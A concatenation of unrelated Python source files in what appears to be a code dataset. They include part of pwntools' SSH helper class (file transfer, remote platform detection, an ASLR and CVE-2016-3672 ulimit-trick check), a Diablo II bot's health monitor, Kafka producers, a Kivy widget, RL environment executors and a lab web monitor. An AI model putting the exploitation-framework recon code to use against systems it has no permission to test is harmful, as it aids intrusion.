remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename, 'rb') as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg):
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = context._decode(self.readlink('-f',remote).strip())
libs[remote] = 0
if directory is None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers, sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme')
>>> cwd = s.set_working_directory()
>>> s.ls()
b''
>>> s.pwd() == cwd
True
>>> s = ssh(host='example.pwnme')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == b''
>>> _=s.set_working_directory(homedir)
>>> assert b'foo' in s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,b'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
symlink = os.path.join(self.pwd(), b'*')
if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
symlink = symlink.decode('utf-8')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = b'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
self.cwd = wd
if not isinstance(wd, str):
self.cwd = wd.decode('utf-8')
self.info("Working directory: %r" % self.cwd)
if symlink:
self.ln('-s', symlink, '.')
return wd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
r"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip().decode(),
'node': io.recvline().lower().strip().decode(),
'release': io.recvline().lower().strip().decode(),
'version': io.recvline().lower().strip().decode(),
'machine': io.recvline().lower().strip().decode(),
'processor': io.recvline().lower().strip().decode(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
lsb_info = io.recvall().strip().decode()
self._platform_info['distro'], self._platform_info['distro_ver'] = lsb_info.split()
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith(b'0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3BG barrier)
self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
|
health_manager.py | from template_finder import TemplateFinder
from ui import UiManager
from ui import BeltManager
from pather import Location
import cv2
import time
import keyboard
from utils.custom_mouse import mouse
from utils.misc import cut_roi, color_filter, wait
from logger import Logger
from screen import Screen
import numpy as np
import time
from config import Config
class HealthManager:
def __init__(self, screen: Screen, template_finder: TemplateFinder):
self._config = Config()
self._screen = screen
self._template_finder = template_finder
self._ui_manager = UiManager(screen, self._template_finder)
self._belt_manager = None # must be set with the belt manager form bot.py
self._do_monitor = False
self._did_chicken = False
self._last_rejuv = time.time()
self._last_health = time.time()
self._last_mana = time.time()
self._last_merc_healh = time.time()
self._callback = None
self._pausing = True
self._last_chicken_screenshot = None
def stop_monitor(self):
self._do_monitor = False
def set_belt_manager(self, belt_manager: BeltManager):
self._belt_manager = belt_manager
def set_callback(self, callback):
self._callback = callback
def did_chicken(self):
return self._did_chicken
def reset_chicken_flag(self):
self._did_chicken = False
self._pausing = True
def update_location(self, loc: Location):
if loc is not None and type(loc) == str:
bosses = ["shenk", "eldritch", "pindle", "nihlatak", "trav", "arc", "diablo"]
prev_value = self._pausing
self._pausing = not any(substring in loc for substring in bosses)
if self._pausing != prev_value:
debug_str = "pausing" if self._pausing else "active"
Logger.info(f"Health Manager is now {debug_str}")
@staticmethod
def get_health(img: np.ndarray) -> float:
config = Config()
health_rec = [config.ui_pos["health_left"], config.ui_pos["health_top"], config.ui_pos["health_width"], config.ui_pos["health_height"]]
health_img = cut_roi(img, health_rec)
# red mask
mask1, _ = color_filter(health_img, [np.array([0, 110, 20]), np.array([2, 255, 255])])
mask2, _ = color_filter(health_img, [np.array([178, 110, 20]), np.array([180, 255, 255])])
mask = cv2.bitwise_or(mask1, mask2)
health_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
# green (in case of poison)
mask, _ = color_filter(health_img, [np.array([47, 90, 20]), np.array([54, 255, 255])])
health_percentage_green = (float(np.sum(mask)) / mask.size) * (1/255.0)
return max(health_percentage, health_percentage_green)
@staticmethod
def get_mana(img: np.ndarray) -> float:
config = Config()
mana_rec = [config.ui_pos["mana_left"], config.ui_pos["mana_top"], config.ui_pos["mana_width"], config.ui_pos["mana_height"]]
mana_img = cut_roi(img, mana_rec)
mask, _ = color_filter(mana_img, [np.array([117, 120, 20]), np.array([121, 255, 255])])
mana_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
return mana_percentage
@staticmethod
def get_merc_health(img: np.ndarray) -> float:
config = Config()
health_rec = [config.ui_pos["merc_health_left"], config.ui_pos["merc_health_top"], config.ui_pos["merc_health_width"], config.ui_pos["merc_health_height"]]
merc_health_img = cut_roi(img, health_rec)
merc_health_img = cv2.cvtColor(merc_health_img, cv2.COLOR_BGR2GRAY)
_, health_tresh = cv2.threshold(merc_health_img, 5, 255, cv2.THRESH_BINARY)
merc_health_percentage = (float(np.sum(health_tresh)) / health_tresh.size) * (1/255.0)
return merc_health_percentage
def _do_chicken(self, img):
if self._callback is not None:
self._callback()
self._callback = None
if self._config.general["info_screenshots"]:
self._last_chicken_screenshot = "./info_screenshots/info_debug_chicken_" + time.strftime("%Y%m%d_%H%M%S") + ".png"
cv2.imwrite(self._last_chicken_screenshot, img)
# clean up key presses that might be pressed in the run_thread
keyboard.release(self._config.char["stand_still"])
wait(0.02, 0.05)
keyboard.release(self._config.char["show_items"])
wait(0.02, 0.05)
mouse.release(button="left")
wait(0.02, 0.05)
mouse.release(button="right")
time.sleep(0.01)
self._ui_manager.save_and_exit(does_chicken=True)
self._did_chicken = True
self._pausing = True
def start_monitor(self):
Logger.info("Start health monitoring")
self._do_monitor = True
self._did_chicken = False
start = time.time()
while self._do_monitor:
time.sleep(0.1)
# Wait until the flag is reset by main.py
if self._did_chicken or self._pausing: continue
img = self._screen.grab()
# TODO: Check if in town or not! Otherwise risk endless chicken loop
ingame_template_match = self._template_finder.search("WINDOW_INGAME_OFFSET_REFERENCE", img, roi=self._config.ui_roi["window_ingame_ref"], threshold=0.9)
if ingame_template_match.valid:
health_percentage = self.get_health(img)
mana_percentage = self.get_mana(img)
# check rejuv
success_drink_rejuv = False
last_drink = time.time() - self._last_rejuv
if (health_percentage < self._config.char["take_rejuv_potion_health"] and last_drink > 1) or \
(mana_percentage < self._config.char["take_rejuv_potion_mana"] and last_drink > 2):
success_drink_rejuv = self._belt_manager.drink_potion("rejuv", stats=[health_percentage, mana_percentage])
self._last_rejuv = time.time()
# in case no rejuv was used, check for chicken, health pot and mana pot usage
if not success_drink_rejuv:
# check health
last_drink = time.time() - self._last_health
if health_percentage < self._config.char["take_health_potion"] and last_drink > 3.5:
self._belt_manager.drink_potion("health", stats=[health_percentage, mana_percentage])
self._last_health = time.time()
# give the chicken a 6 sec delay to give time for a healing pot and avoid endless loop of chicken
elif health_percentage < self._config.char["chicken"] and (time.time() - start) > 6:
Logger.warning(f"Trying to chicken, player HP {(health_percentage*100):.1f}%!")
self._do_chicken(img)
# check mana
last_drink = time.time() - self._last_mana
if mana_percentage < self._config.char["take_mana_potion"] and last_drink > 4:
self._belt_manager.drink_potion("mana", stats=[health_percentage, mana_percentage])
self._last_mana = time.time()
# check merc
merc_alive = self._template_finder.search(["MERC_A2","MERC_A1","MERC_A5","MERC_A3"], img, roi=self._config.ui_roi["merc_icon"]).valid
if merc_alive:
merc_health_percentage = self.get_merc_health(img)
last_drink = time.time() - self._last_merc_healh
if merc_health_percentage < self._config.char["merc_chicken"]:
Logger.warning(f"Trying to chicken, merc HP {(merc_health_percentage*100):.1f}%!")
self._do_chicken(img)
if merc_health_percentage < self._config.char["heal_rejuv_merc"] and last_drink > 4.0:
self._belt_manager.drink_potion("rejuv", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
elif merc_health_percentage < self._config.char["heal_merc"] and last_drink > 7.0:
self._belt_manager.drink_potion("health", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
Logger.debug("Stop health monitoring")
# Testing: Start dying or lossing mana and see if it works
if __name__ == "__main__":
import threading
import keyboard
import os
keyboard.add_hotkey('f12', lambda: Logger.info('Exit Health Manager') or os._exit(1))
config = Config()
screen = Screen(config.general["monitor"])
template_finder = TemplateFinder(screen)
belt_manager = BeltManager(screen, template_finder)
manager = HealthManager(screen, template_finder)
manager.set_belt_manager(belt_manager)
manager._pausing = False
Logger.info("Press f12 to exit health manager")
health_monitor_thread = threading.Thread(target=manager.start_monitor)
health_monitor_thread.start()
while 1:
if manager.did_chicken():
manager.stop_monitor()
health_monitor_thread.join()
break
wait(0.5)
|
producers.py | import asyncio
import threading
from abc import ABC, abstractmethod
from confluent_kafka import SerializingProducer, Producer, KafkaException
from confluent_kafka.schema_registry import SchemaRegistryClient
from confluent_kafka.schema_registry.json_schema import JSONSerializer
from confluent_kafka.serialization import StringSerializer
from app.models import BetDataList
import app.settings as config
from app.utils.advanced_scheduler import async_repeat_deco
class GenericProducer(ABC):
bootstrap_servers = config.broker_settings.broker
schema_registry_conf = {'url': config.broker_settings.schema_registry}
# bootstrap_servers = 'localhost:9092'
# schema_registry_conf = {'url': 'http://localhost:8081'}
@abstractmethod
def model_to_dict(self, obj, ctx):
...
@property
@abstractmethod
def schema(self):
...
@abstractmethod
def produce(self, id, value, headers) -> asyncio.Future:
...
def _produce_data(self):
while not self._cancelled:
self._producer.poll(0.1)
def produce_data(self):
if not self._polling_thread.is_alive():
self._polling_thread.start()
def close(self):
self._cancelled = True
self._polling_thread.join()
def reset_state(self):
self._cancelled = False
def __init__(self, loop=None, normal_prod=False):
if not normal_prod:
schema_registry_client = SchemaRegistryClient(self.schema_registry_conf)
json_serializer = JSONSerializer(self.schema, schema_registry_client, to_dict=self.model_to_dict)
producer_conf = {'bootstrap.servers': self.bootstrap_servers,
'key.serializer': StringSerializer('utf_8'),
'value.serializer': json_serializer
}
else:
producer_conf = {'bootstrap.servers': self.bootstrap_servers}
self._loop = loop or asyncio.get_event_loop()
if not normal_prod:
self._producer = SerializingProducer(producer_conf)
else:
self._producer = Producer(producer_conf)
self._polling_thread = threading.Thread(target=self._produce_data)
self._cancelled = False
class CsvGenProducer(GenericProducer):
topic = 'csv-gen-reply'
def model_to_dict(self, obj: BetDataList, ctx):
return None
@property
def schema(self):
return None
def produce(self, id, value, headers=None) -> asyncio.Future:
result_fut = self._loop.create_future()
def delivery_report(err, msg):
""" Called once for each message produced to indicate delivery result.
Triggered by poll() or flush(). """
if err is not None:
print('Message delivery failed: {}'.format(err))
self._loop.call_soon_threadsafe(result_fut.set_exception, KafkaException(err))
else:
print('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
self._loop.call_soon_threadsafe(result_fut.set_result, msg)
self._producer.produce(topic=self.topic, key=id, value=value, on_delivery=delivery_report, headers=headers)
return result_fut
csv_gen_producer: CsvGenProducer
def init_producers():
@async_repeat_deco(3, 3, always_reschedule=True)
async def init_csv_gen_producer(_):
global csv_gen_producer
csv_gen_producer = CsvGenProducer(asyncio.get_running_loop(), normal_prod=True)
csv_gen_producer.produce_data()
@async_repeat_deco(3, 3, always_reschedule=True)
async def init_betdata_finish_producer(_):
global bet_data_finish_producer
bet_data_finish_producer = BetDataFinishProducer(asyncio.get_running_loop(), normal_prod=True)
bet_data_finish_producer.produce_data()
asyncio.run_coroutine_threadsafe(init_csv_gen_producer('csv_gen_producer'), loop=asyncio.get_running_loop())
def close_producers():
csv_gen_producer.close()
|
bang.py | from kivy import graphics
from kivy.uix.label import Label
import threading
import time
STATES = 'normal', 'down'
class Bang(Label):
def __init__(self, text, delay=0.25, **kwds):
super().__init__(text=text, **kwds)
self.delay = delay
self.lock = threading.RLock()
self._state = False
@property
def _state(self):
return self.state == STATES[1]
@_state.setter
def _state(self, state):
self.state = STATES[bool(state)]
self.on_size()
def bang(self):
with self.lock:
self.target_time = time.time() + self.delay
if not self._state:
self._state = True
threading.Thread(target=self._target, daemon=True).start()
def on_size(self, *args):
self.canvas.clear()
if self._state:
with self.canvas:
graphics.Color(0, 1, 1)
graphics.Rectangle(pos=self.pos, size=self.size)
def _target(self):
while True:
with self.lock:
remains = self.target_time - time.time()
if remains <= 0:
self._state = False
break
time.sleep(remains)
|
vectorized_env_executor.py | import numpy as np
import pickle as pickle
from multiprocessing import Process, Pipe
import copy
class IterativeEnvExecutor(object):
"""
Wraps multiple environments of the same kind and provides functionality to reset / step the environments
in a vectorized manner. Internally, the environments are executed iteratively.
"""
def __init__(self, env, num_rollouts, max_path_length):
self._num_envs = num_rollouts
self.envs = np.asarray([copy.deepcopy(env) for _ in range(self._num_envs)])
self.ts = np.zeros(len(self.envs), dtype='int') # time steps
self.max_path_length = max_path_length
def step(self, actions):
"""
Steps the wrapped environments with the provided actions
Args:
actions (list): lists of actions, of length meta_batch_size x envs_per_task
Returns
(tuple): a length 4 tuple of lists, containing obs (np.array), rewards (float), dones (bool),
env_infos (dict). Each list is of length meta_batch_size x envs_per_task
(assumes that every task has same number of meta_envs)
"""
assert len(actions) == self.num_envs
all_results = [env.step(a) for (a, env) in zip(actions, self.envs)]
# stack results split to obs, rewards, ...
obs, rewards, dones, env_infos = list(map(list, zip(*all_results)))
# reset env when done or max_path_length reached
dones = np.asarray(dones)
self.ts += 1
dones = np.logical_or(self.ts >= self.max_path_length, dones)
for i in np.argwhere(dones).flatten():
obs[i] = self.envs[i].reset()
self.ts[i] = 0
return obs, rewards, dones, env_infos
def reset(self):
"""
Resets the environments
Returns:
(list): list of (np.ndarray) with the new initial observations.
"""
obses = [env.reset() for env in self.envs]
self.ts[:] = 0
return obses
@property
def num_envs(self):
"""
Number of environments
Returns:
(int): number of environments
"""
return self._num_envs
class ParallelEnvExecutor(object):
"""
Wraps multiple environments of the same kind and provides functionality to reset / step the environments
in a vectorized manner. Thereby the environments are distributed among meta_batch_size processes and
executed in parallel.
"""
def __init__(self, env, n_parallel, num_rollouts, max_path_length):
assert num_rollouts % n_parallel == 0
self.envs_per_proc = int(num_rollouts/n_parallel)
self._num_envs = n_parallel * self.envs_per_proc
self.n_parallel = n_parallel
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_parallel)])
seeds = np.random.choice(range(10**6), size=n_parallel, replace=False)
self.ps = [
Process(target=worker, args=(work_remote, remote, pickle.dumps(env), self.envs_per_proc, max_path_length, seed))
for (work_remote, remote, seed) in zip(self.work_remotes, self.remotes, seeds)] # Why pass work remotes?
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
def step(self, actions):
"""
Executes actions on each env
Args:
actions (list): lists of actions, of length meta_batch_size x envs_per_task
Returns
(tuple): a length 4 tuple of lists, containing obs (np.array), rewards (float), dones (bool), env_infos (dict)
each list is of length meta_batch_size x envs_per_task (assumes that every task has same number of meta_envs)
"""
assert len(actions) == self.num_envs
# split list of actions in list of list of actions per meta tasks
chunks = lambda l, n: [l[x: x + n] for x in range(0, len(l), n)]
actions_per_meta_task = chunks(actions, self.envs_per_proc)
# step remote environments
for remote, action_list in zip(self.remotes, actions_per_meta_task):
remote.send(('step', action_list))
results = [remote.recv() for remote in self.remotes]
obs, rewards, dones, env_infos = map(lambda x: sum(x, []), zip(*results))
return obs, rewards, dones, env_infos
def reset(self):
"""
Resets the environments of each worker
Returns:
(list): list of (np.ndarray) with the new initial observations.
"""
for remote in self.remotes:
remote.send(('reset', None))
return sum([remote.recv() for remote in self.remotes], [])
def set_tasks(self, tasks=None):
"""
Sets a list of tasks to each worker
Args:
tasks (list): list of the tasks for each worker
"""
for remote, task in zip(self.remotes, tasks):
remote.send(('set_task', task))
for remote in self.remotes:
remote.recv()
@property
def num_envs(self):
"""
Number of environments
Returns:
(int): number of environments
"""
return self._num_envs
def worker(remote, parent_remote, env_pickle, n_envs, max_path_length, seed):
"""
Instantiation of a parallel worker for collecting samples. It loops continually checking the task that the remote
sends to it.
Args:
remote (multiprocessing.Connection):
parent_remote (multiprocessing.Connection):
env_pickle (pkl): pickled environment
n_envs (int): number of environments per worker
max_path_length (int): maximum path length of the task
seed (int): random seed for the worker
"""
parent_remote.close()
envs = [pickle.loads(env_pickle) for _ in range(n_envs)]
np.random.seed(seed)
ts = np.zeros(n_envs, dtype='int')
while True:
# receive command and data from the remote
cmd, data = remote.recv()
# do a step in each of the environment of the worker
if cmd == 'step':
all_results = [env.step(a) for (a, env) in zip(data, envs)]
obs, rewards, dones, infos = map(list, zip(*all_results))
ts += 1
for i in range(n_envs):
if dones[i] or (ts[i] >= max_path_length):
dones[i] = True
obs[i] = envs[i].reset()
ts[i] = 0
remote.send((obs, rewards, dones, infos))
# reset all the environments of the worker
elif cmd == 'reset':
obs = [env.reset() for env in envs]
ts[:] = 0
remote.send(obs)
# set the specified task for each of the environments of the worker
elif cmd == 'set_task':
for env in envs:
env.set_task(data)
remote.send(None)
# close the remote and stop the worker
elif cmd == 'close':
remote.close()
break
else:
raise NotImplementedError
|
webmonitoring.py | import logging
from threading import Thread
import datetime as dt
from datetime import datetime
import dateutil.parser as dp
from plot import plotMeteoStuff
from shellchecks import *
import time
import cherrypy
import signal
import socket
import sys
import os
import meteo
import plot
plots_path = 'plots/'
daq_path = '/data/DAQ/'
db_path = './conditions_db.sqlite'
update_time = 60 # seconds
# for connection to the meteo station
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
server_address = ("172.16.32.127", 5143)
# for writing to DB
meteo.initDB(db_path)
# init logging
# Create a custom logger
logger = logging.getLogger('web_monitoring')
log_file_name = 'conditions_monitoring_' + time.strftime('%d-%m-%Y_%H-%M') + '.log'
logging.basicConfig(filename=log_file_name, level=logging.DEBUG,
format = '%(asctime)s - [%(name)s] %(levelname)s: %(message)s',
datefmt = '%m/%d/%Y %I:%M:%S %p')
state = {
"x" : 0,
"meteo_data" : [],
"meteo_time_offset" : 0, # in seconds
"readout_time" : None
}
def readMeteoStation():
try:
sock.sendto("Q", server_address)
data = sock.recv(1024) # buffer size is 1024 bytes
logger.debug("Received data from meteo server: " + data.strip())
return data
except:
logger.error("In connection to meteo station: " + str(sys.exc_info()[0]))
def checkMeteoStation(S):
line = readMeteoStation()
read_time = datetime.now()
data = meteo.writeRecord(line, read_time, 'zyx')
logger.debug("Written data to DB: " + str(data))
# check time offset between meteo028 PC and server
dt = dp.parse(data[0]) - read_time
S["meteo_time_offset"] = dt.total_seconds()
def getDataForPlots(S):
now = datetime.now()
retro_shift = dt.timedelta(days=-1)
S["meteo_data"] = meteo.getRecordsSince(now + retro_shift)
def makePlots(S):
plot.plotMeteoStuff(S["meteo_data"], plots_path)
checks = (
checkMeteoStation,
getDataForPlots,
makePlots
)
class Root(object):
def __init__(self):
self.last_readout = 0
self.recent_folder = ""
self.recent_file = ""
def loadStatus(self, current_time):
if( abs(current_time - self.last_readout) < 120 ):
#if last readout was closer than 120 s, do not read out again
return self.last_readout
# if last readout was older, read out all relavant parameters
#
file = getMeteoLogFile()
plotMeteoStuff(file, plots_path)
file.close()
#
self.recent_folder = getMostRecentFolder(daq_path, '????.??.??_????')
self.recent_file = getMostRecentFile(self.recent_folder[1])
self.last_readout = current_time
return current_time
@cherrypy.expose
def index(self):
global state
if state["readout_time"] is not None:
readout_time = state["readout_time"].strftime('%Y-%m-%d %H:%M:%S')
else:
readout_time = 'No readouts.'
s = """
<HTML>
<HEAD>
<TITLE>J-PET Monitoring</TITLE>
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta http-equiv="refresh" content="%d">
</HEAD>
<BODY BGCOLOR="FFFFFF">
<DIV><h2>Status at: %s (last readout time)</h2></DIV>
<CENTER>
<IMG SRC="./plots/temp.png" ALIGN="BOTTOM">
<IMG SRC="./plots/pressure.png" ALIGN="BOTTOM">
<IMG SRC="./plots/patm.png" ALIGN="BOTTOM">
<IMG SRC="./plots/humidities.png" ALIGN="BOTTOM">
</CENTER>
<DIV><h3>Time difference between server and meteo PC: %d seconds</h3></DIV>
</BODY>
</HTML>
""" % (update_time,
readout_time,
state["meteo_time_offset"],)
# self.recent_folder[1],
# os.path.basename(self.recent_file[1]),
# str(int(current_time-self.recent_file[0]))
# )
# <DIV><h3>Most recent folder %s</h3></DIV>
# <DIV><h3>Most recent HLD file %s</h3></DIV>
# <DIV><h3>Last access %s seconds ago</h3></DIV>
return s
if __name__ == '__main__':
conf = {
'global': {
# Remove this to auto-reload code on change and output logs
# directly to the console (dev mode).
# 'environment': 'production',
},
'/': {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # hours
},
'/plots': {
"tools.staticdir.on": True,
"tools.staticdir.dir": "plots",
"tools.staticdir.index": 'index.html',
"tools.staticdir.root": os.getcwd(),
}
}
# Take care of signal handling
def signal_handler(sig, frame):
print('You pressed Ctrl+C!')
logger.info("SIGINT received, cleaning up and exiting.")
sock.close()
cherrypy.engine.exit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# Start the server with the above app and the above config.
def thread1(threadname):
cherrypy.tree.mount(Root(), '/', conf)
cherrypy.config.update({'server.socket_host': '0.0.0.0', })
cherrypy.config.update({'server.socket_port': 8000, })
cherrypy.config.update({'log.screen': False,
'log.access_file': '',
'log.error_file': ''})
cherrypy.engine.start()
cherrypy.engine.block()
# thread of the HTTP server
thread1 = Thread( target=thread1, args=("HTTP Server thread", ) )
thread1.daemon = True
thread1.start()
# control event loop
while True:
state["x"] = state["x"] + 1
for f in checks:
f(state)
state["readout_time"] = datetime.now()
time.sleep(update_time)
|
server.py | #!/usr/bin/env python3
import threading
import socket
